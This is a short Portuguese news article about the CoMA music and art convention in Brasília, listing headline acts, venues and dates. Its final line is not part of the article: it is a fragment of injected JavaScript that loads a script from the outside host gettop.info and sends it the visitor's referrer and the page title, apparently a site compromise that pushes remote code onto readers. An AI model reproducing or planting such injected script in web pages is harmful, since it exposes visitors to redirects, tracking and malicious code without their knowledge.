Cerca de 60 mil pessoas, sendo 15 mil turistas, deverão participar da Convenção de Música e Arte (CoMA), em Brasília, de 4 a 6 de agosto. A programação terá 50 grupos musicais, com destaque para o pernambucano Lenine, o paulistano Emicida e os brasilienses da banda Scalene. Atrações de outros países integram a agenda, além de painéis, conferências, palestras, debates, áreas de convivência e de alimentação. Os ingressos podem ser comprados pelo site.
A estrutura do evento, chamada de Complexo CoMA, será montada no canteiro central do Eixo Monumental, e engloba os seguintes equipamentos públicos: Planetário de Brasília, Centro de Convenções Ulysses Guimarães, Clube do Choro e Fundação Nacional de Artes (Funarte).
Para o secretário adjunto de Turismo, Jaime Recena, a mostra cultural dialoga com a vocação de Brasília como destino turístico. “Além disso, o festival alimenta o cenário da economia local, projetando a cidade com um futuro ainda mais promissor.”
Convenção de Música e Arte – CoMA
De 4 a 6 de agosto (de sexta-feira a domingo)
No gramado central do Eixo Monumental, altura da Funarte
Classificação indicativa 16 anos
Ingressos e mais informações pelo site do festival
Confira a programação:
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;